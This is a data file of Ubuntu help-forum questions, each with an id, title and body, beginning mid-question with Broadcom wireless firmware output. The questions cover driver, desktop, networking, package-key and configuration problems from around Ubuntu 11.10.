all 0 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no and lsmod output is following [ code ] rin @ rin : ~ $ lsmod module size used by bnep 18436 2 rfcomm 47946 8 parport_pc 36962 0 ppdev 17113 0 binfmt_misc 17540 1 btusb 18600 2 bluetooth 166112 23 bnep , rfcomm , btusb joydev 17693 0 snd_hda_codec_idt 70553 1 snd_hda_intel 33390 2 snd_hda_codec 104802 2 snd_hda_codec_idt , snd_hda_intel uvcvideo 72711 0 snd_hwdep 13668 1 snd_hda_codec usbhid 47198 0 videodev 93004 1 uvcvideo hid 95463 1 usbhid v4l2_compat_ioctl32 17083 1 videodev dell_wmi 12681 0 sparse_keymap 13890 1 dell_wmi snd_pcm 96755 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30547 1 snd_seq_midi dell_laptop 13831 0 dcdbas 14490 1 dell_laptop psmouse 73882 0 s erio_raw 13166 0 i915 566711 2 snd_seq_midi_event 14899 1 snd_seq_midi drm_kms_helper 42558 1 i915 drm 236330 3 i915 , drm_kms_helper i2c_algo_bit 13423 1 i915 snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event snd_timer 29991 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq snd 68266 13 snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 12680 1 snd wmi 19256 1 dell_wmi snd_page_alloc 18529 2 snd_hda_intel , snd_pcm video 19412 1 i915 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp r8169 52788 0 here is output when i try to install b43-fwcutter sudo apt-get install b43-fwcutter reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : b43-fwcutter 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/16.9 kb of archives . after this operation , 90.1 kb of additional disk space will be used . selecting previously deselected package b43-fwcutter . ( reading database ... 129372 files and directories currently installed . ) unpacking b43-fwcutter ( from ... /b43-fwcutter_1 % 3a014-9_amd64.deb ) ... processing triggers for man-db ... setting up b43-fwcutter ( 1:014-9 ) ... and firmware rin @ rin : ~ $ sudo apt-get install firmware-b43-installer reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : firmware-b43-installer 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/3,272 b of archives . after this operation , 53.2 kb of additional disk space will be used . selecting previously deselected package firmware-b43-installer . ( reading database ... 129379 files and directories currently installed . ) unpacking firmware-b43-installer ( from ... /firmware-b43-installer_1 % 3a014-9_all.deb ) ... deleting old extracted firmware ... setting up firmware-b43-installer ( 1:014-9 ) ... an unsupported bcm4312 low-power ( lp-phy ) device was found . use b43 lp-phy firmware ( firmware-b43-lpphy-installer package ) instead . aborting . there is no folder b43 in /lib/firmware ( for firmware etc . ) i am not sure as right now which driver is loaded and which one is working.is there a way that without formatting the entire thing i can get it back on track ?
95853	gnome desktop locks up , no keyboard or mouse clicks	just updated the nvidia driver and now when reboot the login works but then gnome just locks up ( freezes ) . mouse can move across screen but no clicks work neither does keyboard commands like ctrl+alt+t for terminal . how do i access if i can not even get to a terminal to try and re-install nvidia driver manually or un-install it .
95860	how do i configure firestarter to allow netbios name lookups	when firestarter is running ( using default settings ) , i ca n't look up names of local windows shared pcs ( nmblookup fails with errno=operation not permitted ) . this also means i ca n't browse the shares with nautilus . when i click the `` stop '' button , nmblookup succeeds and i can browse the shares with nautilus . how do i configure firestarter 's policy to solve this ? ( firestarter is v1.0.3 under ubuntu 11.10 . )
95865	my ubuntu 's default icons and theme were partially 'reset ' ?	for some reason , my icons and part of my theme seemed have 'reset ' to default ? i do n't remember doing anything . just started using ubuntu 2d . any suggestions to fix this problem ? ( i 'm using ubuntu 11.10 ) .
95871	ubuntu crashes when booting form cd	i 'm trying to install ubuntu 11.10 on my pc . i first tried wubi to see how it supports my hardware . it did n't boot at all and crashed . i tried to load ubuntu from a cd , the same thing happened . i have windows 7 installed already . -graphic care : nvidia geforce gt 240 -cpu : intel i5 thanks
95875	how do i make my atheros ar9285 wireless adapter work ?	today i installed ubuntu 11.10 x64 on to my lenovo b570 using wubi.exe . after booting up , i discovered that i could not turn on wireless networking . i have a atheros ar9285 wireless card . i ran through the ubuntu wireless troubleshooting guide , and the output suggest that the card has a driver , but it simply wont turn on ! ( i will post this soon . ) linuxwireless.org seems to have an archive of drivers called compat-wireless which is purported to fix this issue , but i 'm new to linux and do n't know how to install them . lbm may also be an solution , but i 'm having difficulty downloading and installing the package . there have been several post about driver issues with this card before , but all of the solutions assume wired internet access , or i simply do n't understand them . any help will be greatly appreciated ! what i 've tried so far : installed linux backport modules today . wifi is still not working . installed compat-wireless . wifi is still not working . additional information : nm-tool networkmanager tool state : disconnected - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : ath9k state : unavailable default : no hw address : 74 : de:2b:84:86 : a2 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points sudo lshw -c network *-network disabled description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 74 : de:2b:84:86 : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.0.0-12-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : d0500000-d050ffff sudo lspci |grep atheros 02:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) < /pre > < pre > sudo lsmod |grep ath ath9k 127538 0 mac80211 310872 1 ath9k ath9k_common 13839 1 ath9k ath9k_hw 312866 2 ath9k , ath9k_common ath 24067 2 ath9k , ath9k_hw cfg80211 199587 3 ath9k , mac80211 , ath sudo iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=14 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off locate -i ath9k /lib/modules/3.0.0-12-generic/kernel/drivers/net/wireless/ath/ath9k /lib/modules/3.0.0-12-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k.ko /lib/modules/3.0.0-12-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_common.ko /lib/modules/3.0.0-12-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_htc.ko /lib/modules/3.0.0-12-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_hw.ko /usr/src/linux-headers-3.0.0-12/drivers/net/wireless/ath/ath9k /usr/src/linux-headers-3.0.0-12/drivers/net/wireless/ath/ath9k/kconfig /usr/src/linux-headers-3.0.0-12/drivers/net/wireless/ath/ath9k/makefile /usr/src/linux-headers-3.0.0-12/include/linux/ath9k_platform.h /usr/src/linux-headers-3.0.0-12-generic/include/config/ath9k /usr/src/linux-headers-3.0.0-12-generic/include/config/ath9k.h /usr/src/linux-headers-3.0.0-12-generic/include/config/ath9k/ahb.h /usr/src/linux-headers-3.0.0-12-generic/include/config/ath9k/common.h /usr/src/linux-headers-3.0.0-12-generic/include/config/ath9k/debugfs.h /usr/src/linux-headers-3.0.0-12-generic/include/config/ath9k/htc /usr/src/linux-headers-3.0.0-12-generic/include/config/ath9k/htc.h /usr/src/linux-headers-3.0.0-12-generic/include/config/ath9k/hw.h /usr/src/linux-headers-3.0.0-12-generic/include/config/ath9k/pci.h /usr/src/linux-headers-3.0.0-12-generic/include/config/ath9k/rate /usr/src/linux-headers-3.0.0-12-generic/include/config/ath9k/htc/debugfs.h /usr/src/linux-headers-3.0.0-12-generic/include/config/ath9k/rate/control.h /usr/src/linux-headers-3.0.0-12-generic/include/linux/ath9k_platform.h after some research , i 'm fairly certain atheros ' ath9k driver is worthless , and needs to be replaced . since i already tried this with lbm and compat-wireless , i will look for an older version of the ath9k driver . i 'm not sure what madwifi is but it warrants looking into as well . also looking into turning off softblock . has n't someone already fixed this issue ?
95876	how can i setup my wiimote as mouse ?	i recently saw a video how a guy used his wiimote as mouse for his computer . since i have a media center pc and a wii , it would be great to get rid of peripherals and just use the wiimote as my mouse . how can i set that up ? note : you should not only be able to use the buttons , but also move the cursor .
95889	lightweight window manager/desktop environment similar to unity	i am looking for a lightweight window manager/desktop environment similar to unity , but not unity/unity-2d gnome or kde . specifically , i 'm looking for something light with the following features : window buttons layout like in unity . side bar/dock on left with system tray , apps , devices & a menu of some sort . or a top bar with system tray , apps , devices & a menu of some sort . the reason i am looking for this is that my computer ca n't handle unity & my development apps at once any more .
95890	mounting sdb as a secondary storage drive	i have just finished a build with an asus m4a88t-m , and an amd athlon 250 3.0gig cpu . the graphics are amd and are in the board . because of the great cost of new hds , i used an older maxtor 160 ide as the boot ( it had never been a boot drive ) and a { i think ! } wd 100 gig ide as a storage drive . both have been formatted in ext . 4 . the system is completely ubuntu 11.10 and very likely to remain same . years ago , when i wanted to gain access to the second ( sdb ) hd for storage , all i had to do was go into the gui interface ( on gnome ... i know not what version ... ) , identify myself as the root and then change permissions on the hd . how do i get the system to recognize the secondary hd as a storage vessel and not as a boot disk ? i do n't remember seeing any questions regarding this issue as the os was being installed on sda . help !
95893	should i choose 10.04 or 10.10 ?	i wanted to install ubuntu on a partition . i have used ubuntu 10.10 in virtual box , but i am looking for more raw power . please tell me which one to go for , ubuntu 10.04 or ubuntu 10.10 ? both ubuntu 10.04 and ubuntu 10.10 are old , but i have heard & read a lot of ill things about ubuntu 11.04 . in my own experience , i found 11.04 to be irritating , so i am avoiding newer releases . also ubuntu 10.04 is lts , that 's why i am in doubt between two . note : i mainly want to use ubuntu for programming .
95904	how do i open a file from inside a bash script ?	ok , so running gedit myfile.txt works well . but what about opening a file from inside a bash script , using the default desktop app linked to the filetype ? i 've tried below , which works great when run manually in terminal , but when i put it in a bash file , nothing happens : # ! /bin/bash xdg-open `` myfile.txt '' & what should i do instead ? please note that i need the file to stay open after the terminal is closed as well .
95909	vpnc from networking icon on gnome panel fails	i often need to connect to my workstation in my home institution . i connect through a cisco vpn tunnel and then i use a ssh tunnel . in order to start a vpn connection i use the plug in on my gnome bar , that was installed when i installed the cisco vpn client by apt-get . this usually works . now i am connecting from a new institution and the plug-in does n't work , but i am still able to connect starting the daemon from terminal , and everything is ok . instead , when i try to start from gui it says 'welcome to your home institution network ' , as it says when my connection is successful , but then i can not ssh tunnel to the workstations in my institution neither i can surf the web . when i go back to the hotel , the vpn plug-in works again ! i think this is a bug ( is it ? ) . does anybody know what i could do to spot what is going on ? i am using ubuntu 10.04.3 lts
95910	command for determining my public ip ?	if i check with google , i can see my public ip . is there something on the ubuntu command-line which will yield me the same answer ?
95912	error when installing `` python-nautilus ''	when i try to install python-nautilus using the ubuntu software center i get an error message titled `` package dependencies can not be resolved '' . the following output is displayed in the details section : package dependencies can not be resolved the following packages have unmet dependencies : python-nautilus : depends : libc6 ( > = 2.2.5 ) but 2.13-20ubuntu5 is to be installed depends : libglib2.0-0 ( > = 2.16.0 ) but 2.30.2-4ubuntu1~oneiric1 is to be installed depends : libgtk-3-0 ( > = 3.0.0 ) but 3.2.0-0ubuntu3 is to be installed depends : libnautilus-extension1 ( > = 1:2.91 ) but 1:3.2.1-0ubuntu3.2 is to be installed depends : libpython2.7 ( > = 2.7 ) but 2.7.2-5ubuntu1 is to be installed this output does n't make sense for me . depends on libpyhon2.7 , and version 2.7.2 is available ... what is going wrong here ? next , i tried to install python-nautilus from command line : username ~ $ sudo apt-get install python-nautilus reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : python-nautilus : depends : python-gobject but it is not going to be installed e : unable to correct problems , you have held broken packages . however , python-gobject is already installed : username ~ $ sudo apt-get install python-gobject reading package lists ... done building dependency tree reading state information ... done python-gobject is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . to me it looks like my package index must be hopelessly broken . however , i did not have any problems with other packages , yet . i am using a nearly fresh version 11.10 of ubuntu . i tried executing `apt-get update & & apt-get upgrade `` but this does n't change anything . any hints how i can fix this issue are appreciated .
95915	unity mt grab handles plugin disappeared !	i discovered it just today , and i do n't know how long it had gone . in brief , if i open ccsm , under uncategorized plugins , i ca n't find unity grab handles plugin and i 'm pretty sure it was at its place at first , because i configured it . i 'm running 11.10 .
95916	remasterys xubuntu 11.10	i made a remasterys dist-mode iso of xubuntu , modded by myself ( i just installed compiz and little more ) i then made a cd from this iso and a bootable usb , by unetbooin , both of them show the same behaviour : when i choose installer directly , they start a xubuntu livecd session ( perfectly working ) but i did n't see a way to launch an installation . how can i do that ? is there 's a command line to launch install wizard , or something like that ?
95920	encrypt tar.gz file on create	i have a script which creates a nightly backup of several directories . it is created using tar -czf , and the destination tar.gz file path is on a mounted network directory . the resulting file is about 1.2gb large . the network speed is reasonably fast ( copying from the network drive to the local occurs at ~28mb/sec ) . now i want to use public-key encryption to encrypt the tar.gz file before transferring it to the network drive , and would like to know what the best way to do so is . should i create the file locally first , encrypt it , and then copy over ? or is there a way to `` stream '' tar output through an encryption process , and write the results directly to the network drive ?
95922	why am i having overheating problems on hp pavilion g6-1058er ?	i 've just installed ubuntu 11.10 64-bit on my laptop hp pavilion g6-1058er and i 've got problems with it . when i shut down or reboot my pc , when i turn it on again , my bios gives me this warning : ( something like this ) your pc was shut down or rebooted because of overheating ... and also this problem was when i had ubuntu 10.04 installed , when i 'm working on windows everything is ok .
95926	how to initiate vpn from terminal	under `` system '' > `` preferences '' > `` network connections '' i can create pptp vpns . this works when i am at a gui , i can click the network connections icon in the top right , and select a vpn from the list and connect to it . is it possible to connect to these pptp sessions via the terminal if i only have ssh access , using these predefined sessions , so i do n't have to type all the details in again ?
95929	how do i get back the colours toolbar in kolour paint ?	i have accidentally removed the colours toolbar on kolour paint . i have tried right clicking on the menu bar but the toolbar settings options shows up disabled .
95932	how do i configure universal usb modems ( e.g . iball 3.5g connect )	there is no user guide with this usb modem for linux installation and it is not detected automatically in ubuntu 11.10 . help .
95941	how to activate user after changing uid with usermod ?	logged in as root and i changed the uid of user 'carmen ' via terminal-command usermod -u 502 carmen but now user 'carmen ' does n't show up anymore on the login-screen ( where you can choose , which account to log in ) , you can only log in via terminal . what happened ? using ubuntu 11.10 on a macbook .
95943	how do i set up postfix to send mail through it ?	i have tried different tutorials , but at the end it always gives me errors when i test it using `` telnet `` myname '' 25 ... i need help . i want a simple tutorial through which i can set up postfix on ubuntu and send mail through it ?
95947	why does compiz suddenly stop working ?	i have 11.10 installed and have deactivated the compiz animated effects , but have turned on wobbly windows . so , in short , windows do n't fade / slide / etc , but they wobble . i ca n't find a pattern , but it seems that while i am working for a few hours , the wobbly windows suddenly stop being wobbly for no reason . only on some windows , mind you . it 's obviously not expected behaviour ...
95951	how do i query ubuntu one account information ?	for what i promise are un-nefarious reasons , i 'd like to programmatically fetch the ubuntu one account details for the current user of an application ( eg name , email , free space ) . is there way to achieve this ?
95954	akira not replaced to 明	if i changed keyboard layout to `` chineese '' and start gedit , '' aki-ra '' or `` akira '' its not replaced to 明 . any suggestions ?
95955	how to sniff https ?	i 've been using windows for a long time with the http analyzer application , which is basically wireshark for http/https protocols and is able to actually process https requests the same way as http . now i 'm using wireshark in ubuntu , but it does n't capture the https traffic , which is expected but not convenient . i guess the windows app was somehow hooking to the lower level os events of decrypting the https response - is there something of this kind for ubuntu ?
95956	creating a unity lens : the name `activation ' does not exist in the context of `unity '	i 'm trying to create a lens for unity in 11.10 using vala . this is my daemon.vala : using dee ; using gee ; namespace pidginlens { public class daemon : glib.object , unity.activation { public static void main ( string [ ] args ) { } } } now trying to compiling with valac -- pkg gee-1.0 -- pkg dee-1.0 -- pkg unity just says daemon.vala:6.40-6.55 : error : the type name `unity.activation ' could not be found public class daemon : glib.object , unity.activation ^^^^^^^^^^^^^^^^ compilation failed : 1 error ( s ) , 0 warning ( s ) libunity4 libunity6 libunity-dev libunity-core-4.0.4 libunity-core-4.0-dev gir1.2-unity-4.0 are all installed , and it obviously finds the unity package ( since changing -- pkg unity to something like -- pkg unity-not-here yields another error . so what 's my mistake ? why is unity.activation not there ? thanks guys !
95957	which arm soc are supported by ubuntu/will be supported in future ?	i want to build an arm based home server and a htpc and i want to know which arm socs are currently supported by ubuntu or will be supported in the ( near ) future . will nvidia tegra 2/3 be supported ?
95958	how do i get lotus symphony 3.0 working ?	i have recently switched from windows 7 to ubuntu 11.10 64 bit.i did so under the impression that lotus symphony would function on this operating system . i have done about everything i can think of - including a force install of the i386 package , to trying dylan 's symphony package found on omgubuntu . both of these did install it and bring up and agreement screen . i accepted the terms and it does n't open the program . the icon of the program when opened is a gray question mark box , then it closes . any help would be greatly appreciated ! i know about libreoffice , and i know that it is functional on 64 bit , but i find symphony to have a far superior ui . so all though that would be an alternative i do n't feel as though that is a solution to my problem .
95960	option for pcs with low disk space ?	i am planning on running stock ubuntu 12.04 on most of my pc 's in order to get the five year lts release support ( and perhaps i will update one every six months out of curiousity ) . i have an eeepc 701 , which only has 4 gb of hard drive space , so running stock ubuntu wo n't fit . i presently have peppermint one on it . i 've looked into lubuntu ( which is great ) , but is not getting five year support with 12.04 . i 've looked at the ubuntu mini.iso option and building it up from there , but am wondering if this route will get the five years of updates . anyone have any ideas/advice on upgrading a low spec machine to get the five year support ?
95961	i have a laptop , can i use wifi and cable ( ethernet ) networking at same time ?	i have an intranet without connection to the internet , and then i have wifi with connection to the internet . can i make a configuration that makes it possible to be connected to the internet through wifi and at the same time being connected to intranet through cable ? i 'm on a laptop .
95969	using gnome-settings-daemon in xfce	i have n't seen this anywhere else , and this is the only major showstopping issue that i have with a transition to xfce . system : hp pavillion dm1-3200us i 'm interested in moving over to xfce , but my main issue is that media keys do n't work properly . i 've tried the solution provided on xfce 's wiki ( mapping the keys ) , but that is n't a proper solution for me - the laptop i 'm on does n't light up when the sound is muted with that solution . i 've seen that gnome-settings-daemon actually properly detects the media keys on my netbook , but when i experimented with that in a live environment , it only worked for a single session , and failed to work . my question then becomes : is it a good idea to use gnome-settings-daemon on my xfce build ? if so , what would i need to install/include/build/divine/hack to ensure that it worked consistently throughout a normal days ' use ? if gnome-settings-daemon is not a tenable long-term solution , what would i need to perform to not only get media keys to work properly , but also to get my netbook 's `` mute '' light to work properly ?
95971	can i run rails and php servers from same machine ?	i have a ubuntu box 10.04 that already has a lamp stack configured on it . i would like to play around with rails on this machine as well . is there a way i can install rails without messing up the php stuff ? maybe have it default to the php server and switch to the rails server when i use a certain port ?
95977	set a specific screen resolution with xrandr	so i installed lubuntu 11.04 on my virtualbox . i could n't find the 1366x768 resolution so i installed guest additions but it was n't there . so i used this code to set the correct resolution : gtf 1366 768 60 xrandr -- newmode `` 1368x768_60.00 '' 85.86 1368 1440 1584 1800 768 769 772 795 $ xrandr -- addmode vbox0 1368x768_60.00 xrandr -- output vbox0 -- mode 1368x768_60.00 the problem is that i ca n't find a way to save this information for the next reboot . i tried on .xinitrc and nothing happens . then i tried on .bashrc but it 's not working , i need to start a console before this commands are executed .
95978	why wo n't it allow me to change the access for disk games	i now have ubuntu lts and any time i try to install a game using a disk it says mark as execute , and i do , but for some reason it says `` sorry , could not change the permissions of `` setup.exe '' : error setting permissions : read-only file system '' . is there any way of changing this ?
95979	gpg error while running apt-get	i am trying to update some r packages . for that i am running sudo apt-get update command . i am running ubuntu 10.04 on vm player , host is windows xp sp3 and i am not getting badsig error . when i run that command i get the following error : fetched 491b in 7s ( 64b/s ) reading package lists ... done > w : gpg error : http : //streaming.stat.iastate.edu lucid/ release : the following signatures could n't be verified because the public key is not available : no_pubkey 51716619e084dab9 ubuntu @ ubuntu-desktop : i tried many things like using running some command like these : gpg -- keyserver keyserver.ubuntu.com -- recv d67fc6eae2a11821 gpg -- export -- armor d67fc6eae2a11821 | sudo apt-key add - or sudo apt-key adv -- recv-keys -- keyserver keyserver.ubuntu.com 313d312748a22a95 ; gpg -- export -- armor 313d312748a22a95 | sudo apt-key add - or like in this question . none of this is working . can anyone help me out ? ( also , i am not much familiar with ubuntu and this forum . if the tags are not perfect , please re-tag the question . ) edit 1 : after trying bruno 's answer : ubuntu @ ubuntu-desktop : ~ $ gpg -- keyserver keyserver.ubuntu.com -- recv e084dab9 gpg : requesting key e084dab9 from hkp server keyserver.ubuntu.com gpgkeys : key e084dab9 not found on keyserver gpg : no valid openpgp data found . gpg : total number processed : 0 ubuntu @ ubuntu-desktop : ~ $ edit 2 : i tried as per bruno 's second comment , still no luck : edited the file `/etc/sudoers as : # /etc/sudoers # # this file must be edited with the 'visudo ' command as root . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults env_keep=https_proxy # ( i added his line , without this comment ) # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all ) all # allow members of group sudo to execute any command after they have # provided their password # ( note that later entries override this , so you might need to move # it further down ) % sudo all= ( all ) all # # includedir /etc/sudoers.d # members of the admin group may gain root privileges % admin all= ( all ) all after modifying this file , i re-started the machine . then ran the following commands and got the errors : ubuntu @ ubuntu-desktop : ~ $ export http_proxy=http : //abc-xyz.com:8080 ; export https_proxy= $ http_proxy ubuntu @ ubuntu-desktop : ~ $ sudo -e apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys e084dab9 [ sudo ] password for ubuntu : executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /etc/apt/secring.gpg -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver keyserver.ubuntu.com -- recv-keys e084dab9 gpg : requesting key e084dab9 from hkp server keyserver.ubuntu.com gpgkeys : key e084dab9 not found on keyserver gpg : no valid openpgp data found . gpg : total number processed : 0 ubuntu @ ubuntu-desktop : ~ $ i also tried the info given here . this script can handle the proxy issue by itself . but when i run this command : sudo add-apt-repository ppa : nilarimogard/webupd8 , i get following error : executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /etc/apt/secring.gpg -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver keyserver.ubuntu.com -- recv 1db29afff6c70907b57aa31f531ee72f4c9d234c gpg : requesting key 4c9d234c from hkp server keyserver.ubuntu.com gpgkeys : http fetch error 7 : could n't connect to host gpg : no valid openpgp data found . gpg : total number processed : 0 ubuntu @ ubuntu-desktop : ~ $ which is kind of chicken-egg problem . since this also needs to cross the same proxy . : )
95981	internet is slow & intermittent	something kinda weird happened to me today . i 've been using ubuntu for month on my computer without any issue but today i decided to install windows 7 on dual boot so that my gf can use photoshop ... of course i had issue installing windows so i had to hard reboot it . after doing this , ubuntu could not activate my network card and failed to connect to my network ( rebooting did n't do anything ) . i had to go back to windows and restart it `` safely '' in order to fix it . now my computer connects back to my network but internet is really slow . dns resolution takes a long time . speedtest.net shows a unstable link . ifconfig shows dropped rx packets . pate @ pepette-i7 : ~ $ ifconfig eth0 eth0 link encap : ethernet hwaddr 50 : e5:49:3a:64 : b1 inet addr:192.168.1.11 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :52e5:49ff : fe3a:64b1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2261 errors:0 dropped:2261 overruns:0 frame:2261 tx packets:17701 errors:0 dropped:23 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2204486 ( 2.2 mb ) tx bytes:1122744 ( 1.1 mb ) interrupt:42 base address:0xe000 using a netbook on the same networks works fine so it 's not the router . and going back to windows works fine too so it 's hardware related . i tried to switch to google 's dns , /etc/init.d/networking restart , ifconfig eth0 down , ifconfig eth0 up . after some testing , local network is intermittent too . if i connect from my laptop to the computer it works but then freeze and i ca n't type anything in the ssh client . do n't know what to do now : ( thanks for reading .
95982	are card reader/writers supposed to poll all the time ?	i am looking at top and noticed that after i managed to get my usb2.0-crw ( realtek chip and it 's built into my laptop ) , its kernel module keeps on showing up . top says it 's using 0.0 memory but 1 % cpu , and priority is 20 . is there some way to get this to stop polling and use , probably interrupts ? i remember i read that this used to be a problem with optical drives on linux . it would keep on polling after every few seconds . just wondering if this is as simple as a command or a file to modify , perhaps a recompile of the driver/module , but if it needs rewriting the code , then i think there is not much that can be done . thanks . *oh btw : 2.6.38-13-generic kernel on natty narwhal , rts5139
95983	is there an equivalent of `` stay '' for ubuntu ?	on my laptop at work , i use an external monitor , but when i 'm away from my desk i just use the laptop monitor . on osx i used to use stay but i 'm struggling to get the same functionality on ubuntu .
95985	is it possible to change owernship of a file without root access ?	if a user a owns file.txt , can user a change the ownership of the file to user b without root access ? when i run a chown b file.txt as user a , i get a operation not permitted error . it seems to me that since user a owns the file , they ought to be able to change the ownership , but i do n't see a way to do it . thanks for the help !
95987	how to force update manager to use wired connection by default	i prefer ( out of superstition , i guess ... ) installing updates through a wired connection , and so i turn off my laptop 's wifi every time i 'm about to give the update manager the go-ahead . a bit tedious . is there a way to set the manager 's preferences so that it chooses the wired connection by default ?
95990	my system freezes randomly	my system freezes randomly while using google chrome , mozilla firefox . mouse works but i am not able to click anywhere . by pressing ctrl + alt + f1 i can get into command shell but , there i do not find anything other than a login option . the only option left with me is going for sudo poweroff or reboot . my system configuration is as follows : core2duo 2.0ghz 3gb ram ddr2 256mb ati mobility radeon hd3400 320gb sata hard drive i am using gnome shell with gallium 0.4 amd on rv620 not the restricted ati raedon drivers . i have also discovered that while scrolling in firefox/chrome the cpu usage of firefox/chrome and gnome-shell increases a lot around 60-80 percent each depending upon the scroll speed . also on typing dmesg in the terminal at the end i found the following : [ 527.824455 ] software-center [ 7689 ] : segfault at 4 ip 08119f10 sp bf9d5690 error 4 in python2.7 [ 8048000+223000 ] [ 1117.960394 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 3446.888142 ] ce : hpet increased min_delta_ns to 20113 nsec [ 3682.755118 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 4157.184312 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 4386.161414 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 4458.513696 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 4481.456381 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 4538.280377 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 4565.289503 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 4660.490307 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 5120.940930 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 5191.228400 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 5283.840125 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 5328.562658 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 6565.623439 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 7580.348173 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id when the system freezes , pressing super button several times the system logs out to the login screen .
95994	simple way to get all .o files but one	i 'm trying to link all *.o files from another folder and would like to in my makefile do something like ; g++ *.o ( folder/*.o and not folder/main.o ) -o bin is there someway i can use somekind of simple regex here ?
95995	ca n't connect ubuntu 11.10 with broadband connection	i have recently installed ubuntu 11.10 .before that i used ubuntu 10.10 . in 10.10 i used my broadband by configuring as a dsl connection.but in 11.10 i ca n't do that . it ca n't connect . every time it says that i 'm not connected.what might be the problem ? please help me .
96006	how to chat on irc via terminal ?	how to chat on irc via terminal ?
96011	running commands on boot in 11.10	so i am getting properly confused on how to create a startup script on my ubuntu 11.10 server . i have read about init-scripts , upstart-jobs and more , but i get even more confused the more i read . i 've tried various guides , but i just have n't found anyone that actually work . can someone show me how i create a simple script that will work in 11.10 ?
96012	notification alert sounds do not work	after installing ubuntu 11.10 on a new pc i have sound working and i have the login sound working but i do n't get any other alert / notification sounds . e.g . if a question box pops up - there 's no sound . i 've tried some other suggestions like copying all the sound files to the /usr/share/sounds folder but this has n't helped . any ideas will be greatly received .
96013	ubuntuserver , graphics-card died , cant log in to use ssh/vns	okay , weird situation . i have a really old desktop and yesterday i decided to setup ubuntu-server as a home server on that thing . it has no onboard graphics . i installed gnome-desktop , so at the start of the server , i have to log in . today i restarted it , and it looks like the graphics card died . i get no signal on the monitor . i ca n't use ssh or vns , because the services start after i log in ... is there a way to log in over the network ? cmd ? net use ? can someone tell me what keys i have to press to log in ? so i can try to do it blindy and then setup auto-login . i tried to press enter after the boot to select the user `` administrator '' and then typed the password and enter again , but it wouldnt log in because ssh/vnc still wo n't work . ubuntu-server 10.04 32-bit . reeaally old computer . no other graphics-card i could use . already tried different vga/dvi cables ... tl ; dr : ubuntu-server with gnome desktop is started and hanging at the login-screen . graphics-card died so i cant see it . have to remotely log in to enable auto-login .
